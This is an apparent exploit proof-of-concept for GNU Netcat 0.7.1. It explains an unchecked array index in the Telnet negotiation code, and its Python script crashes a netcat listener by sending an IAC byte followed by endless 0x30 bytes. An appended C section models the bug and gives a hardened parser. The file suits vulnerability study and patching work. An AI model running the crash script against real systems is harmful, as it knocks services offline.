78 lines
2.4 KiB
Python
Executable file
#!/usr/bin/python
# -*- coding: utf-8 -*-

### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###

# Date: 2016-11-19
# Exploit Author: n30m1nd
# Vendor Homepage: http://netcat.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
# Version: 0.7.1
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux

# Credits
# =======
# Props to Giovanni and Armando, creators of this useful piece of software, thank you guys!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!

# How to
# ======
# * Get a distribution that ships with GNU netcat, or compile netcat from source:
# *   # Download netcat-0.7.1.tar.gz from the Software Link above
# *   tar -xzf netcat-0.7.1.tar.gz
# *   cd netcat-0.7.1/
# *   ./configure
# *   make
# *   # The binary is built as src/netcat
#
# * Start netcat listening with Telnet negotiation enabled (-T):
# *   ./netcat -nlvp 12347 -T
# * Run this script from a different terminal
#

# Why?
# ====
# With Telnet negotiation enabled (-T option), netcat scans every received buffer in telnet.c for
# Telnet IAC (0xFF) command sequences. Once an IAC has been seen, the static index 'l' is non-zero
# and every following byte is appended to the 4-byte static array getrq[] through getrq[l++], with
# no check against the size of getrq[]. The index is only reset by the switch/case that handles a
# complete, recognised command; a second byte that is not a known command (this PoC uses 0x30, '0')
# leaves 'l' non-zero, so each further byte is written one position past the previous one, beyond
# the end of getrq[] and into the adjacent static data, until the process crashes.

# Vulnerable code
# ===============
# telnet.c
# ...
#  76 static unsigned char getrq[4];
#  77 static int l = 0;
#  78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
#  88 /* loop all chars of the string */
#  89 for (i = 0; i < ref_size; i++) {
#  90   /* if we found IAC char OR we are fetching a IAC code string process it */
#  91   if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#  99   /* copy the char in the IAC-code-building buffer */
# 100   getrq[l++] = buf[i]; // BANG! no bounds check against sizeof(getrq)
# ...

# Exploit code
# ============

import socket

RHOST = "127.0.0.1"
RPORT = 12347

print("[+] Connecting to %s:%d" % (RHOST, RPORT))
s = socket.create_connection((RHOST, RPORT))
s.send(b"\xff")  # Telnet IAC: from now on every byte received lands in getrq[l++]
print("[+] Telnet control character sent")
print("[i] Starting")
i = 0
try:
    while True:  # Keep feeding bytes that are not a known Telnet command until the listener dies
        i += 1
        s.send(b"\x30")
except socket.error as exc:  # Connection reset / broken pipe once netcat has crashed
    print("[+] GNU Netcat crashed on iteration: %d (%s)" % (i, exc))
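The getrq[] index bug described in the "Why?" and "Vulnerable code" sections above, modelled in C as an added example (this is not netcat's own code and not part of the original PoC). unsafe_max_index() reproduces the original index handling without performing the out-of-bounds write and reports how far 'l' runs for the PoC's byte stream (IAC followed by repeated 0x30); safe_parse() is a hardened rewrite that bounds the subscript and resets 'l' on every unrecognised command. The Telnet command values are the RFC 854 ones; the sample streams, struct telnet_state, hardened_checks() and the decline-every-option replies are constructed for this illustration and are assumptions of the example, not netcat's behaviour.

```c
#include <stddef.h>

/* RFC 854 command bytes that may follow IAC (0xFF) */
enum { TELNET_SE = 240, TELNET_NOP = 241, TELNET_WILL = 251, TELNET_WONT = 252,
       TELNET_DO = 253, TELNET_DONT = 254, TELNET_IAC = 255 };
#define GETRQ_SIZE 4   /* same size as getrq[] in netcat 0.7.1 telnet.c */

/* Constructed sample: what the PoC sends, one IAC followed by ten '0' bytes */
const unsigned char SAMPLE_CRASH[11] = { TELNET_IAC, '0', '0', '0', '0', '0',
                                         '0', '0', '0', '0', '0' };

/* Model of the ORIGINAL index handling. It performs no out-of-bounds write; it
 * returns the highest subscript 'l' would reach on getrq[GETRQ_SIZE] for this
 * stream. Anything above GETRQ_SIZE is a write past the array in the real code. */
size_t unsafe_max_index(const unsigned char *buf, size_t n)
{
    unsigned char getrq[GETRQ_SIZE] = {0};
    size_t l = 0, max_l = 0;

    for (size_t i = 0; i < n; i++) {
        if (buf[i] != TELNET_IAC && l == 0)
            continue;                           /* ordinary data, no IAC pending */
        if (l < GETRQ_SIZE)
            getrq[l] = buf[i];                  /* original: getrq[l++] = buf[i], unchecked */
        if (++l > max_l)
            max_l = l;
        if (l == 1)
            continue;                           /* got IAC, wait for the command byte */
        switch (getrq[1]) {
        case TELNET_SE: case TELNET_NOP: case TELNET_IAC:
            l = 0; break;                       /* two-byte sequence complete */
        case TELNET_WILL: case TELNET_WONT: case TELNET_DO: case TELNET_DONT:
            if (l >= 3) l = 0; break;           /* three-byte sequence complete */
        default:
            break;                              /* unknown command: 'l' is never reset */
        }
    }
    return max_l;
}

struct telnet_state { unsigned char getrq[GETRQ_SIZE]; size_t l; }; /* kept across recv() calls */

/* Hardened variant: data bytes go to 'out' (>= n bytes), option refusals to
 * 'resp' (>= n + 2 bytes); returns the data byte count. The subscript is bounded
 * and 'l' is reset on every unrecognised command, so it never runs past getrq[]. */
size_t safe_parse(struct telnet_state *st, const unsigned char *in, size_t n,
                  unsigned char *out, unsigned char *resp, size_t *resp_len)
{
    size_t outlen = 0;
    *resp_len = 0;
    for (size_t i = 0; i < n; i++) {
        if (in[i] != TELNET_IAC && st->l == 0) {
            out[outlen++] = in[i];              /* ordinary data passes through */
            continue;
        }
        if (st->l >= GETRQ_SIZE)
            st->l = 0;                          /* fail closed: never index past the array */
        st->getrq[st->l++] = in[i];
        if (st->l == 1)
            continue;
        switch (st->getrq[1]) {
        case TELNET_IAC:                        /* IAC IAC escapes a literal 0xFF */
            out[outlen++] = TELNET_IAC; st->l = 0; break;
        case TELNET_SE: case TELNET_NOP:
            st->l = 0; break;
        case TELNET_WILL: case TELNET_WONT: case TELNET_DO: case TELNET_DONT:
            if (st->l < 3) break;               /* option byte still to come */
            resp[(*resp_len)++] = TELNET_IAC;   /* decline every option */
            resp[(*resp_len)++] = (st->getrq[1] == TELNET_WILL ||
                                   st->getrq[1] == TELNET_WONT) ? TELNET_DONT : TELNET_WONT;
            resp[(*resp_len)++] = st->getrq[2];
            st->l = 0; break;
        default:
            st->l = 0; break;                   /* unknown command: drop IAC+cmd, resynchronise */
        }
    }
    return outlen;
}

/* Three constructed exchanges through the hardened parser; 0 means all behaved */
int hardened_checks(void)
{
    struct telnet_state st = {{0}, 0};
    unsigned char out[32], resp[32];
    size_t ol, rl;
    /* "ab" IAC WILL ECHO "cd": data passes, option 1 (ECHO) is refused with IAC DONT ECHO */
    const unsigned char in1[] = {'a', 'b', TELNET_IAC, TELNET_WILL, 1, 'c', 'd'};
    ol = safe_parse(&st, in1, sizeof in1, out, resp, &rl);
    if (ol != 4 || out[0] != 'a' || out[3] != 'd' || rl != 3 ||
        resp[0] != TELNET_IAC || resp[1] != TELNET_DONT || resp[2] != 1)
        return 1;
    /* The PoC stream: IAC plus the unknown command are dropped, the other nine '0' are data */
    ol = safe_parse(&st, SAMPLE_CRASH, sizeof SAMPLE_CRASH, out, resp, &rl);
    if (ol != 9 || rl != 0 || st.l != 0)
        return 2;
    /* IAC DO split across two recv() calls still completes from the saved state */
    const unsigned char in3a[] = {TELNET_IAC}, in3b[] = {TELNET_DO, 3};
    safe_parse(&st, in3a, 1, out, resp, &rl);
    ol = safe_parse(&st, in3b, 2, out, resp, &rl);
    if (ol != 0 || rl != 3 || resp[1] != TELNET_WONT || resp[2] != 3)
        return 3;
    return 0;
}
```

For the PoC stream unsafe_max_index() returns 11 against an array of 4, which is the write the original getrq[l++] performs for real; the hardened parser resets on the unknown command and keeps the subscript at or below 3 for any input. The same pattern applies to the SB/SE subnegotiation case if it is ever added: bound the index before every write, not after.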